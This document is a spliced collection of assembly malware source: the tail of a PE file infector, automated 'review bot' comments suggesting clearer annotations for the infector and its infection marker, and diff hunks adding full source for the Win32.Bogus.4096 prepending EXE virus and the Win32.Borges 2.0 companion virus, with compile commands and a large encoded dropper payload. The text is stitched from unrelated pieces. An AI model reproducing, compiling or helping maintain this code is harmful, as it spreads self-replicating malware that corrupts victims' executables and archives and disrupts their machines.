OverVA: pop esi
mov ecx,0ch
rep cmpsb
je FindAdd
inc edx
NXT: cmp byte ptr [edi],0h
je NxtCmp
inc edi
jmp NXT
FindAdd:pop eax ;eax - kernel32 export table
shl edx,1h ;edx - GetProcAddress position
mov ebx,[eax + 24h]
add ebx,[esp]
add ebx,edx
mov dx,word ptr [ebx]
shl edx,2h
mov ebx,[eax + 1ch]
add ebx,[esp]
add ebx,edx
mov ebx,[ebx]
add ebx,[esp] ;ebx - GlobalAlloc address
pop eax
push PAGE_EXECUTE_READWRITE
push 1000h
push VirusSize
push 0h
call ebx ;allocate memory
push eax
xchg edi,eax
mov esi,12345678h
VirusEntryPoint equ ($-4)
mov ecx,VirusSize
rep movsb
ret
SizeOfLoaderCode equ ($-Loader_Code)
_GetProcAddress db "GetProcAddress",0
__GetProcAddress dd 0
ApiNamesTable:
_CreateFile db "CreateFileA",0
_CloseHandle db "CloseHandle",0
_CreateFileMapping db "CreateFileMappingA",0
_MapViewOfFile db "MapViewOfFile",0
_UnmapViewOfFile db "UnmapViewOfFile",0
_FindFirstFileA db "FindFirstFileA",0
_FindNextFileA db "FindNextFileA",0
_VirtualProtect db "VirtualProtect",0
ApiAddressTable:
CreateFile dd 0
CloseHandle dd 0
CreateFileMapping dd 0
MapViewOfFile dd 0
UnmapViewOfFile dd 0
FindFirstFile dd 0
FindNextFile dd 0
VirtualProtect dd 0
NumberOfApis equ 8
VirusEnd equ $
Exit:
push eax
call ExitProcess
end _main
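Review bot: The comments in Loader_Code were copied from the GetProcAddress lookup near the top of the file and no longer match the code: the name scanned there is `"VirtualAlloc"`, yet the `shl edx,1h` line is annotated `;edx - GetProcAddress position` and the final `add ebx,[esp]` is annotated `;ebx - GlobalAlloc address`; change them to `;edx - VirtualAlloc name index` and `;ebx - VirtualAlloc address`. The "already infected" test in InfectFile, `cmp byte ptr [eax + 0bh],29h`, also needs a comment naming the field it reads and writes: with eax at the PE signature, offset 0Bh is the high byte of IMAGE_FILE_HEADER.TimeDateStamp (NumberOfSections is read from +6 a few lines later, which is consistent with that layout), so `;infection marker: high byte of FileHeader.TimeDateStamp == 29h` would tell an analyst exactly which header byte identifies a marked file. The same fixed byte is written back unconditionally at `Exit__`, so the comment belongs on both the check and the store.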
+193
@@ -0,0 +1,193 @@
comment *
Win32.Bogus.4096 ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
Disassembly by ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
Darkman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
Win32.Bogus.4096 is a 4096 bytes runtime/direct action EXE virus. Infects
first file in current directory, when executed, by prepending the virus to
the original EXE file.
Compile Win32.Bogus.4096 with Turbo Assembler v 5.0 by typing:
TASM32 /M /ML /Q BOGUS.ASM
TLINK32 -Tpe -c -x -aa -r BOGUS.OBJ,,, IMPORT32
*
.386
.model flat
; KERNEL32.dll
extrn ExitProcess:proc
extrn FindFirstFileA:proc
extrn WinExec:proc
extrn _lclose:proc
extrn _llseek:proc
extrn _lopen:proc
extrn _lread:proc
extrn _lwrite:proc
extrn CopyFileA:proc
.data
MAX_PATH equ 0ffh
FALSE equ 00h
OF_READWRITE equ 02h ; Opens the file for reading and
; writing
SW_SHOW equ 05h ; Activates the window and displays it
; in its current size and position
FILETIME struct
dwLowDateTime DWORD ? ; Specifies the low-order 32 bits of
; the file time
dwHighDateTime DWORD ? ; Specifies the high-order 32 bits of
; the file time
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes DWORD ? ; Specifies the file attributes of the
; file found
ftCreationTime FILETIME <> ; Specifies the time the file was
; created
ftLastAccessTime FILETIME <> ; Specifies the time that the file was
; last accessed
ftLastWriteTime FILETIME <> ; Specifies the time that the file was
; last written to
nFileSizeHigh DWORD ? ; Specifies the high-order DWORD value
; of the file size, in bytes
nFileSizeLow DWORD ? ; Specifies the low-order DWORD value
; of the file size, in bytes
dwReserved0 DWORD ? ; Reserved for future use
dwReserved1 DWORD ? ; Reserved for future use
cFileName BYTE MAX_PATH dup(?)
; A null-terminated string that is the
; name of the file
cAlternate BYTE 0eh dup(?) ; A null-terminated string that is an
; alternative name for the file
ends
FindFileData WIN32_FIND_DATA <>
szFileName db '*.exe',00h ; Name of file to search for
szNewFileName db 'ZerNeboGus.exe',00h
; Null-terminated string that
; specifies the name of the new file
cBuffer db ? ; Buffer for read data, data to be
; written
cBuffer_ db ? ; Buffer for read data, data to be
; written
.code
code_begin:
lea edi,[esp+10h] ; EDI = pointer to buffer for module
; path
push edi ; EDI = pointer to buffer for module
; path
repne scasb ; Find end of filename
mov byte ptr [edi-01h],'.' ; Store dot
pop edi ; EDI = pointer to buffer for module
; path
push offset FindFileData ; Address of returned information
push offset szFileName ; Address of name of file to search
; for
call FindFirstFileA
push FALSE ; If file already exists, overwrite it
push offset szNewFileName ; Address of filename to copy to
push edi ; Address of name of an existing file
call CopyFileA
push OF_READWRITE ; Opens the file for reading and
; writing
push offset FindFileData.cFileName
; Address of name of file to open
call _lopen
mov esi,eax ; ESI = file handle
push OF_READWRITE ; Opens the file for reading and
; writing
push offset szNewFileName ; Address of filename to copy to
call _lopen
mov edi,eax ; EDI = file handle
xor ebx,ebx ; Number of bytes read and written
mov ebp,0fffff000h ; Number of bytes to move through
; source file
read_write_loop:
push 00h ; Position to move from
push ebx ; Number of bytes to move
push esi ; Pointer to destination filename
call _llseek
push 01h ; Length, in bytes, of data buffer
push offset cBuffer ; Address of buffer for read data
push esi ; Pointer to destination filename
call _lread
push 00h ; Position to move from
push ebx ; Number of bytes to move
push edi ; Pointer to source filename
call _llseek
push 01h ; Length, in bytes, of data buffer
push offset cBuffer_ ; Address of buffer for read data
push edi ; Pointer to source filename
call _lread
push 00h ; Position to move from
push ebx ; Number of bytes to move
push esi ; Pointer to destination filename
call _llseek
push 01h ; Number of bytes to write
push offset cBuffer_ ; Address of buffer for data to be
; written
push esi ; Pointer to destination filename
call _lwrite
push 02h ; Position to move from
push 00h ; Number of bytes to move
push esi ; Pointer to destination filename
call _llseek
push 01h ; Number of bytes to write
push offset cBuffer ; Address of buffer for data to be
; written
push esi ; Pointer to destination filename
call _lwrite
push 02h ; Position to move from
push ebp ; Number of bytes to move
push edi ; Pointer to source filename
call _llseek
push 01h ; Length, in bytes, of data buffer
push offset cBuffer ; Address of buffer for read data
push edi ; Pointer to source filename
call _lread
push 00h ; Position to move from
push ebx ; Number of bytes to move
push edi ; Pointer to source filename
call _llseek
push 01h ; Number of bytes to write
push offset cBuffer ; Address of buffer for data to be
push edi ; Pointer to source filename
call _lwrite
inc ebx ; Increase number of bytes read and
; written
inc ebp ; Increase number of bytes to move
; through source file
cmp bx,1000h ; Read and written all of the virus?
jne read_write_loop ; Not equal? Jump to read_write_loop
push edi ; Handle of file to close
call _lclose
push SW_SHOW ; Activates the window and displays it
; in its current size and position
push offset szNewFileName ; Address of filename to copy to
call WinExec
code_end:
end code_begin
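Review bot: The argument comments in read_write_loop are wrong for every `_llseek`, `_lread` and `_lwrite` call: `push esi ; Pointer to destination filename` and `push edi ; Pointer to source filename` push the HFILE values returned by `_lopen` (`mov esi,eax ; ESI = file handle` above), not filename pointers, and the preceding `push 00h`/`push 02h` and `push ebx`/`push ebp` are the iOrigin and lOffset parameters of `_llseek`, not byte counts. Suggest `push esi ; Handle of found .exe` and `push edi ; Handle of copied file`, with `; Origin: start of file` / `; Origin: end of file` on the `push 00h` / `push 02h` lines and `; Offset to seek to` on the `push ebx` / `push ebp` lines. The last `push offset cBuffer ; Address of buffer for data to be` before `call _lwrite` is also cut off mid-sentence and should end `written` like the other occurrences.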
+704
@@ -0,0 +1,704 @@
; ;
; ------------> WIN32.BORGES Virus ver 2.0 by Int13h/IKX <-------------;
; EXE Companion with directory navigation. It drops a virus over RAR;
; archives. On setember 19 reboots the machine and on tuesdays puts a;
; text in the clipboard. ­Jorge Luis Borges se merec¡a el Premio Nobel!;
; PUTRIDO SUECO COMITE NOBEL ;
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - cd13- -;
; ;
; COMPILATION: ;
; tasm32 /ml /m3 borges.asm,,; ;
; tlink32 /Tpe /aa /c /v borges.obj,,, import32.lib, ;
;
.386
.model flat
locals
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn SetCurrentDirectoryA:PROC
extrn GetCurrentDirectoryA:PROC
extrn GetSystemTime:PROC
extrn MoveFileA:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn SetFilePointer:PROC
extrn CloseHandle:PROC
extrn GlobalAlloc:PROC
extrn GlobalLock:PROC
extrn GlobalUnlock:PROC
extrn OpenClipboard:PROC
extrn SetClipboardData:PROC
extrn EmptyClipboard:PROC
extrn CloseClipboard:PROC
extrn GetTickCount:PROC
extrn GetCommandLineA:PROC
extrn CreateProcessA:PROC
extrn lstrcpyA:PROC
extrn MessageBoxA:PROC
extrn ExitWindowsEx:PROC
extrn ExitProcess:PROC
HeaderSize equ FinRARHeader-RARHeader
Size equ 4774
.DATA
TituloVentana db 'WIN32.BORGES VIRUS 2.0 by Int13h/IKX',0
TextoVentana db 'Made in Paraguay, South America',0
Posicion dd 0
MemHandle dd 0
FileHandle dd 0
Chequeo dd 0
Number dd 0
Victimas db '*.EXE',0
Victimas2 db '*.RAR',0
RARHeader:
RARHeaderCRC dw 0
RARType db 074h
RARFlags dw 8000h
RARHeadsize dw HeaderSize
RARCompressed dd Size
RAROriginal dd Size
RAROs db 0
RARCrc32 dd 0
RARFileTime db 063h,078h
RARFileDate db 031h,024h
RARNeedVer db 014h
RARMethod db 030h
RARFnameSize dw FinRARHeader-RARName
RARAttrib dd 0
RARName db "KUARAHY.EXE"
FinRARHeader label byte
SearcHandle1 dd 0
SearcHandle2 dd 0
Longitud dd 0
ProcessInfo dd 4 dup (0)
StartupInfo dd 4 dup (0)
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0
Hallado db 200 dup (0)
Crear db 200 dup (0)
ParaCorrer db 200 dup (0)
Original db 200 dup (0)
Actual db 200 dup (0)
PuntoPunto db '..',0
SystemTimeStruc dw 0,0,0,0,0,0,0,0
Kuarahy2: ; Virus to drop: Kuarahy 1.1 com/exe/sys/obj/ovl/bat/arj/rar/bs/mbr
db 0ebh,03ch,090h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,0bfh,04dh,001h,0b9h,0d8h,000h,02eh,081h,035h,0feh,0d2h,047h,047h
db 0e2h,0f7h,07fh,0ech,0feh,0d2h,033h,0f2h,08bh,0d1h,017h,07ah,0ffh,0f9h,03eh
db 028h,070h,002h,042h,0d2h,082h,029h,002h,0c4h,0e1h,01fh,0ech,0ffh,0f2h,0d2h
db 05dh,0c1h,0fah,063h,0f8h,001h,01eh,05ch,03eh,06ch,0feh,0aeh,0cdh,02dh,047h
db 0d2h,0ffh,021h,05bh,06ah,0f7h,0d0h,045h,0d2h,0fch,0f4h,07eh,0ech,057h,0d2h
db 0b8h,0a6h,0f6h,06bh,0fdh,0d2h,044h,052h,0feh,039h,0fbh,06bh,0fch,082h,0d5h
db 000h,033h,0c1h,046h,0dbh,0fch,01fh,0edh,0a1h,0fdh,03bh,05bh,0d2h,0f8h,069h
db 052h,0d2h,0adh,019h,0b6h,081h,0feh,06ah,0deh,0d2h,016h,09ch,0ffh,0fch,038h
db 0d4h,055h,0d2h,0feh,0f4h,038h,0d4h,054h,0d2h,0adh,0f4h,038h,0d4h,04bh,0d9h
db 0b0h,073h,0b2h,0d2h,0d8h,071h,062h,0d3h,039h,0d4h,0b2h,0d2h,08fh,0d3h,05fh
db 09ch,0feh,0f4h,05dh,04ch,0ffh,05eh,0f8h,09ch,0feh,06ah,0ffh,0d0h,045h,064h
db 0ech,06bh,0ffh,0d2h,044h,052h,0feh,04eh,0d0h,02dh,0e0h,04eh,0ffh,0a0h,0a6h
db 0f4h,07fh,06dh,0b5h,0d2h,01ch,025h,08ah,09dh,0d8h,014h,0f8h,07bh,0feh,09ah
db 0e0h,0d4h,0e1h,0e1h,001h,06ah,0ffh,0d1h,045h,064h,0ech,06bh,0fch,0d2h,044h
db 052h,0feh,01fh,0edh,0fch,038h,0d4h,0ech,0deh,09ch,085h,0e0h,0d4h,043h,0ddh
db 0fch,03ah,049h,0d9h,0f9h,0cdh,0a1h,06ch,089h,0c2h,045h,0b1h,0ebh,03ah,0e2h
db 0ddh,046h,0dbh,0fdh,069h,09dh,0c5h,047h,0d1h,0feh,068h,07eh,0d2h,033h,0c1h
db 07dh,02dh,0deh,0a7h,0ffh,011h,0e1h,0f4h,038h,0d4h,057h,0d2h,0b8h,0f4h,07eh
db 0ech,057h,0d2h,0b8h,0a6h,0f6h,068h,07eh,0d2h,047h,0d0h,0feh,039h,0fbh,0e1h
db 02ch,06bh,0ffh,082h,0e0h,0d5h,045h,0d2h,082h,06ah,0ffh,0d0h,033h,0c1h,046h
db 0d3h,0fch,01fh,0edh,038h,0feh,0aeh,0feh,0d2h,016h,08dh,0f3h,0efh,0edh,01fh
db 08bh,0d1h,017h,0cbh,0f3h,052h,002h,0d1h,08bh,0d1h,017h,0d3h,0f5h,052h,002h
db 0d0h,08bh,0c0h,07dh,02bh,0ffh,0a7h,0f3h,057h,02ch,0a7h,0fdh,03bh,0a4h,0dfh
db 07fh,028h,07eh,0d2h,08ah,0d7h,014h,0d2h,0feh,0d2h,0feh,083h,04fh,0d0h,033h
db 0c1h,0a7h,018h,0fch,0d2h,0aeh,083h,0ach,06ah,0ffh,0d0h,0cdh,000h,047h,0d3h
db 0aeh,04eh,0d0h,02dh,0e0h,04eh,0ffh,06ah,0ffh,0d0h,062h,0fch,001h,0cch,062h
db 0d3h,0a4h,08bh,0a6h,018h,0fch,0d2h,0deh,0ech,0b5h,087h,0bfh,080h,0bfh,09ah
db 0a7h,0eeh,0deh,0f2h,0b5h,0bdh,09fh,0f2h,096h,0b3h,0d9h,0b7h,0deh,09bh,090h
db 0a6h,0cfh,0e1h,096h,0fdh,0b7h,099h,0a6h,0f2h,08ch,0b7h,093h,0b0h,097h,0b3h
db 08eh,0bdh,095h,0a7h,07ch,0f2h,096h,0bbh,090h,0b3h,0dfh,0f2h,0c4h,0fbh,020h
db 055h,0aah,0beh,00fh,003h,0b9h,04bh,008h,02eh,081h,034h,038h,03ch,046h,046h
db 0e2h,0f7h,005h,01ch,038h,049h,039h,0ffh,0d0h,03ch,038h,061h,0b9h,0d1h,020h
db 03eh,016h,0bch,086h,02eh,034h,06fh,04dh,03fh,0d1h,03dh,03eh,084h,02bh,0f1h
db 0f5h,01dh,005h,0f1h,02bh,049h,03bh,0d5h,0e9h,03ch,03eh,084h,019h,009h,0f5h
db 01dh,016h,0b5h,0a6h,0e7h,03ch,012h,0b4h,0bah,0e5h,038h,016h,0b5h,0a6h,02fh
db 034h,012h,0b4h,0bah,02dh,030h,026h,0f9h,026h,03ah,038h,0bch,007h,0d6h,04dh
db 022h,0fdh,063h,039h,0bdh,007h,0ach,0a8h,049h,0cah,0bfh,0d3h,00eh,0b9h,003h
db 0a8h,0ach,04dh,030h,016h,0b5h,0a6h,02fh,034h,012h,0b4h,0a2h,02dh,030h,0d3h
db 033h,0b9h,003h,026h,012h,04dh,035h,0bbh,0ffh,01dh,0bdh,007h,0c6h,0b8h,048h
db 0ddh,023h,080h,02fh,0f5h,0f1h,02bh,001h,0f5h,02fh,04dh,015h,06bh,03bh,036h
db 023h,0b5h,08ah,0e3h,038h,087h,0e7h,03ch,099h,09dh,0b1h,08eh,02fh,034h,083h
db 02bh,030h,09dh,099h,00bh,0fch,0b6h,0fch,0c2h,083h,0bch,03ch,080h,0adh,03ch
db 097h,0b3h,0ffh,093h,0c7h,03fh,0d7h,074h,0b0h,0e0h,074h,0b6h,0fch,01eh,09dh
db 03bh,03ch,015h,0f9h,03ah,0afh,026h,03bh,08ch,076h,0f5h,01dh,08ch,074h,083h
db 0f8h,03ah,0f1h,019h,074h,0b6h,0fch,01eh,0fbh,03eh,03dh,038h,034h,038h,01ah
db 0ffh,03ah,030h,03ch,041h,077h,078h,0b2h,0f8h,00fh,0c7h,032h,027h,0b1h,08eh
db 03ch,038h,085h,003h,010h,0cbh,098h,01eh,0fah,03eh,089h,033h,072h,03eh,023h
db 080h,01dh,01dh,086h,0a9h,038h,0f5h,01dh,03fh,084h,0c6h,0f6h,0f5h,01dh,0b8h
db 082h,02ah,030h,07bh,048h,052h,0bch,086h,02eh,034h,07eh,04dh,03fh,0d1h,041h
db 038h,0bch,086h,02eh,034h,073h,04dh,03fh,0d1h,037h,039h,00fh,0c7h,0bch,086h
db 02eh,034h,07dh,04dh,03fh,0d1h,011h,039h,0bch,086h,02eh,034h,06eh,04dh,03fh
db 0d1h,01fh,039h,088h,012h,0f1h,019h,0bch,0c2h,031h,04dh,031h,087h,01ch,038h
db 03ah,06dh,0d4h,02ah,03dh,065h,03bh,0a9h,0f1h,02eh,03ah,027h,0b7h,0e5h,0b0h
db 0f8h,039h,028h,03ch,016h,03dh,0bfh,04ah,03bh,0c6h,016h,03fh,0bfh,046h,03bh
db 0b2h,0e8h,012h,0b3h,09bh,040h,03fh,0c3h,0d4h,021h,03ch,0d3h,03ch,0d2h,02ch
db 038h,03ch,038h,02ch,038h,059h,03fh,0d4h,0dbh,034h,0b5h,08ah,0cfh,037h,087h
db 03ch,039h,06bh,0c4h,098h,09dh,00fh,0f8h,017h,0e3h,00fh,0f1h,017h,0eah,00fh
db 0ceh,017h,0c7h,00fh,0d5h,0ffh,0d0h,0fah,030h,09dh,014h,03ch,0b4h,0b2h,089h
db 02ch,0b4h,0b2h,08dh,02ch,0b1h,0bah,091h,02ch,0b4h,0b2h,095h,02ch,0b6h,03ah
db 014h,03ch,013h,0fch,087h,03dh,038h,073h,097h,049h,0c4h,07bh,07fh,03ah,027h
db 032h,03fh,0b7h,0cfh,0b1h,086h,070h,02ah,085h,0b8h,03ch,0cbh,098h,036h,032h
db 027h,03bh,012h,0fch,0b5h,082h,074h,02eh,081h,041h,038h,0ceh,096h,0fbh,07dh
db 0c0h,07ah,07dh,0feh,079h,0c6h,068h,086h,0bch,038h,073h,0b2h,032h,0b8h,03ch
db 00ah,0d1h,0c6h,0fdh,086h,0bdh,038h,0cfh,09ch,0b1h,08eh,074h,02ah,083h,0b8h
db 03ch,094h,000h,035h,048h,03bh,096h,0d3h,0c4h,092h,0bdh,0d7h,0bdh,038h,0b7h
db 0f7h,0b4h,036h,0bch,038h,0c6h,084h,04ch,02fh,0c7h,08ch,076h,083h,018h,03ah
db 0f1h,019h,0b1h,0aeh,08bh,028h,084h,038h,077h,0b5h,0a2h,091h,02ch,0f5h,01dh
db 08ch,071h,0f5h,01dh,08ch,070h,0f5h,01dh,0d0h,012h,030h,0b1h,08eh,068h,03ch
db 083h,038h,0c6h,0b3h,0fbh,081h,039h,038h,0cfh,09dh,098h,0b5h,08ah,09eh,02eh
db 087h,03ch,039h,06bh,081h,05ch,0d2h,00fh,0e3h,00fh,0eah,0c3h,0d8h,0cfh,09ch
db 00fh,0ceh,017h,0c7h,00fh,0f8h,017h,0f1h,0ffh,0d0h,03ch,030h,088h,031h,0b1h
db 0aeh,068h,033h,0f1h,019h,085h,022h,03ch,0b5h,08ah,0eeh,02ch,0b3h,0d2h,082h
db 07dh,038h,06dh,080h,03ch,029h,087h,038h,032h,081h,03dh,038h,0f1h,028h,07eh
db 0bbh,0f9h,036h,065h,0dah,0d1h,0bbh,0c3h,018h,049h,039h,0ffh,0f5h,01ch,0d0h
db 003h,032h,001h,02bh,0f1h,04dh,03fh,0d1h,0c5h,031h,001h,0c6h,0f6h,04dh,03fh
db 0d1h,060h,033h,0bch,0c4h,077h,04dh,03fh,0d1h,0b0h,038h,0bch,0c4h,06ah,04dh
db 03fh,0d1h,0b8h,038h,0bch,0c4h,07fh,04ch,043h,0a8h,0ach,0a8h,0bch,0c4h,001h
db 04ch,04bh,005h,03ch,054h,048h,04ah,001h,019h,009h,04ch,028h,005h,01dh,01dh
db 048h,022h,001h,038h,06bh,04ch,07bh,005h,03dh,06fh,048h,023h,0d6h,035h,07dh
db 022h,03ch,016h,0b7h,026h,0e7h,03ch,012h,0b6h,03ah,0e5h,038h,0f7h,012h,0b1h
db 02ah,0e3h,038h,016h,0b0h,026h,0e1h,03ch,0f3h,06ah,06dh,080h,03ch,06fh,0a0h
db 016h,0c3h,026h,02fh,034h,0bch,0d9h,023h,0b8h,0c5h,026h,049h,030h,065h,0b8h
db 0ddh,0d8h,0bch,0f1h,022h,069h,065h,062h,084h,039h,06bh,0a4h,012h,0c7h,022h
db 02bh,030h,0f7h,0a0h,016h,0c3h,026h,02fh,034h,06dh,0b8h,0ddh,027h,0bch,0c1h
db 022h,04dh,034h,061h,0bch,0d9h,0dch,0b8h,0f5h,039h,06dh,061h,0f3h,088h,03fh
db 0f7h,0a0h,068h,06fh,069h,06eh,06eh,06bh,06dh,022h,03eh,001h,038h,050h,04dh
db 036h,0bbh,0c6h,039h,048h,03bh,0d5h,0a8h,03eh,0b3h,0eah,06ah,022h,080h,018h
db 00dh,0f1h,019h,012h,0b1h,022h,092h,02eh,016h,0b0h,03eh,090h,02ah,032h,027h
db 084h,01ch,019h,082h,009h,03dh,0f1h,019h,023h,062h,012h,0b1h,02ah,096h,02eh
db 016h,0b0h,026h,08ch,02ah,0b0h,0e3h,022h,03fh,0c0h,0b3h,0c6h,081h,0bch,038h
db 08ch,016h,0ceh,096h,048h,03bh,0d5h,070h,03eh,01eh,0b7h,07dh,0c1h,035h,01ch
db 018h,001h,056h,058h,04dh,03fh,0d1h,005h,03ah,001h,059h,052h,04dh,03fh,0d1h
db 00dh,03ah,001h,059h,04ah,04dh,03fh,0d1h,015h,03ah,001h,057h,048h,04dh,03fh
db 0d1h,01dh,03ah,001h,04ah,058h,04dh,03fh,0d1h,025h,03ah,001h,04ah,049h,04dh
db 03fh,0d1h,02dh,03ah,001h,051h,048h,04dh,03fh,0d1h,035h,03ah,001h,04eh,04ch
db 04dh,03fh,0d1h,03dh,03ah,001h,051h,052h,04dh,03fh,0d1h,0c5h,039h,001h,054h
db 04ch,04dh,03fh,0d1h,0cdh,039h,032h,03fh,082h,08eh,028h,0bfh,0cbh,09dh,098h
db 0d0h,048h,03eh,0d4h,0dah,03bh,04bh,03fh,0d1h,0e1h,039h,084h,038h,001h,0a4h
db 012h,0c7h,022h,02bh,030h,04bh,03fh,0d1h,0f3h,039h,0afh,036h,023h,0feh,03ah
db 091h,03ch,070h,03ah,06bh,084h,018h,02eh,0f5h,013h,080h,02ah,02ah,00eh,0c7h
db 01ah,0b2h,021h,0f5h,013h,01eh,0b6h,075h,038h,0b0h,032h,090h,02eh,01eh,0fah
db 07dh,038h,018h,01ah,0feh,079h,03ah,03eh,0b1h,002h,08ah,02eh,0b4h,03ah,08ch
db 02eh,063h,03bh,080h,03dh,07bh,086h,045h,02ch,013h,0f5h,0a4h,012h,0c7h,022h
db 02bh,030h,08ch,07dh,082h,041h,028h,0f1h,019h,088h,079h,086h,0b2h,02ch,0f5h
db 01dh,08ch,07dh,082h,0a9h,028h,0f1h,019h,088h,079h,086h,099h,02ch,0f5h,01dh
db 080h,03ch,06fh,0a0h,0c7h,022h,02bh,030h,0b1h,032h,018h,030h,0b1h,02ah,011h
db 030h,0b1h,02ah,0bah,02eh,0b8h,0ddh,027h,0bch,0c1h,022h,04dh,03fh,0d1h,06dh
db 039h,088h,007h,085h,015h,03ch,082h,08ah,02ch,0f1h,019h,0b7h,0cah,0b7h,03ch
db 0d5h,050h,038h,06bh,088h,008h,0f1h,019h,067h,004h,03bh,04ah,03fh,0d1h,013h
db 039h,0d4h,08eh,039h,0bdh,0eeh,04ch,03fh,0d1h,019h,039h,001h,0a8h,0deh,04eh
db 03fh,0d1h,021h,039h,001h,0a2h,03eh,04fh,03fh,0d1h,029h,039h,0bdh,044h,037h
db 06fh,068h,04dh,03fh,0d1h,037h,039h,083h,0cfh,037h,09dh,098h,015h,03fh,038h
db 09fh,08fh,037h,0b3h,0d4h,0b9h,0f9h,02ah,03fh,0d0h,03ch,03eh,085h,09eh,02eh
db 082h,05fh,02dh,088h,078h,0f1h,019h,0d4h,057h,039h,08ch,07ch,081h,03fh,038h
db 086h,08eh,037h,0f5h,01dh,0d1h,0ebh,038h,0bch,006h,02eh,034h,06fh,04dh,03fh
db 0d1h,0efh,038h,0bfh,044h,024h,078h,04eh,03bh,0d5h,0f2h,03ch,0bbh,040h,022h
db 03ch,04ch,03fh,0d1h,0fdh,038h,0bdh,044h,017h,06fh,068h,04dh,03fh,0d1h,08bh
db 038h,0d4h,006h,039h,081h,03ch,03ah,0cbh,0c9h,037h,0eah,048h,039h,07ch,001h
db 068h,03ah,048h,03bh,0d5h,09ah,03ch,001h,078h,03ch,048h,03bh,0d5h,0a2h,03ch
db 0d0h,01dh,03dh,06fh,06ah,06ch,0fch,03ah,0f2h,028h,09bh,048h,03bh,0b0h,03eh
db 04ah,03bh,0f8h,03eh,0f8h,02ch,0b0h,03eh,044h,03bh,09fh,042h,03fh,099h,082h
db 02ch,08dh,03ch,0efh,0d8h,0afh,060h,066h,068h,06eh,013h,0ffh,0bbh,0e6h,038h
db 085h,028h,03ch,0cfh,0cdh,0b1h,02ah,0f2h,028h,0b3h,0d6h,09bh,0f0h,02ch,09fh
db 0fch,028h,0ffh,03ah,0feh,028h,038h,03ch,062h,064h,03dh,09ah,02ah,0bfh,0eah
db 03ch,089h,035h,068h,0efh,0d0h,0efh,0f2h,037h,0eah,0c5h,02bh,0ech,060h,0bch
db 0dch,03dh,0b1h,02ah,082h,028h,09bh,084h,02ch,09dh,0f8h,028h,0c0h,039h,013h
db 03dh,04ah,03fh,09bh,0fch,02ch,0fbh,03eh,0feh,02ch,0c3h,0c7h,067h,0b9h,0f9h
db 037h,03eh,0d0h,01ah,03dh,085h,09eh,02eh,08ch,07ch,082h,05fh,02dh,0f1h,019h
db 0d4h,0adh,038h,08ch,07ch,081h,026h,038h,086h,08eh,028h,0f5h,01dh,0d0h,077h
db 03ch,0d4h,025h,03fh,08ch,002h,0f5h,01dh,036h,023h,080h,018h,01dh,012h,0fdh
db 02ah,092h,02eh,0f5h,01dh,03fh,023h,065h,063h,066h,066h,061h,067h,060h,0a1h
db 016h,0c3h,016h,0e7h,03ch,0bch,006h,02eh,034h,06fh,04dh,0e6h,0b3h,078h,03eh
db 09fh,012h,034h,0d0h,067h,03ch,09fh,084h,028h,0b9h,03ah,084h,028h,038h,03eh
db 0b3h,0d4h,0b9h,0f9h,037h,03eh,0d0h,0f4h,03ch,085h,09eh,02eh,08ch,07ch,082h
db 05fh,02dh,0f1h,019h,0d4h,00fh,038h,08ch,07ch,081h,036h,038h,086h,08eh,028h
db 0f5h,01dh,0d3h,09ch,080h,070h,038h,06ch,06bh,06dh,06ah,06ah,03eh,022h,036h
db 032h,027h,03bh,080h,02fh,0f5h,0f1h,02bh,001h,0f5h,02fh,04ch,075h,080h,03dh
db 03ah,0b1h,0a6h,09ah,02ah,085h,039h,03ch,082h,0bch,038h,0f1h,02bh,01ah,0b9h
db 083h,073h,03ch,0dah,0cbh,04ch,00dh,080h,03dh,03bh,085h,03ah,03ch,0f5h,02fh
db 01eh,0fbh,0beh,035h,03ah,03ch,038h,0b7h,0cdh,06ah,0b9h,0fah,007h,03ch,0ffh
db 038h,075h,040h,063h,0b1h,08eh,04bh,028h,0d4h,0f6h,03bh,080h,035h,03bh,0b1h
db 0a6h,03ch,03ah,085h,03bh,03ch,082h,0bch,038h,0f1h,02bh,088h,03ch,0f1h,022h
db 0bch,0c2h,02fh,04dh,020h,0d0h,03ch,038h,067h,0b9h,0d7h,0aeh,034h,0b5h,08bh
db 06ch,037h,081h,076h,038h,090h,013h,0e7h,08ch,032h,0f5h,02ch,0dah,0cbh,00bh
db 0fch,0f5h,02ah,027h,03bh,066h,066h,061h,067h,013h,0fch,0fbh,0bch,006h,02eh
db 034h,073h,04ch,03fh,0d1h,031h,0c7h,0d4h,0b7h,03fh,00bh,0c3h,0d0h,0bfh,03dh
db 000h,098h,048h,023h,000h,09ah,048h,02fh,000h,0b2h,048h,058h,000h,0b4h,049h
db 03bh,0d5h,0cah,0c2h,080h,03dh,07ah,00fh,0f1h,0f1h,019h,04fh,0d9h,0d5h,0deh
db 0c2h,06ah,084h,039h,07eh,013h,0f5h,0a1h,0f1h,019h,06eh,068h,088h,007h,085h
db 03bh,03ch,082h,079h,02ah,0f1h,019h,037h,0c7h,049h,029h,07bh,0b9h,002h,07eh
db 02eh,038h,03dh,04ch,034h,0c2h,0bfh,0fch,03ah,0c3h,0d5h,084h,0c2h,0b9h,03ah
db 07eh,02eh,09eh,02eh,062h,065h,069h,06eh,080h,03ch,07ah,0f1h,019h,088h,078h
db 086h,07dh,02eh,081h,03fh,038h,0f1h,019h,066h,061h,084h,038h,07eh,0f5h,01dh
db 062h,0d7h,09fh,085h,0c7h,0c3h,082h,0c1h,0c7h,084h,039h,07eh,0f5h,01dh,081h
db 03ah,038h,086h,0e8h,02ch,08ch,07ch,0f5h,01dh,085h,033h,03bh,0d4h,0bfh,03fh
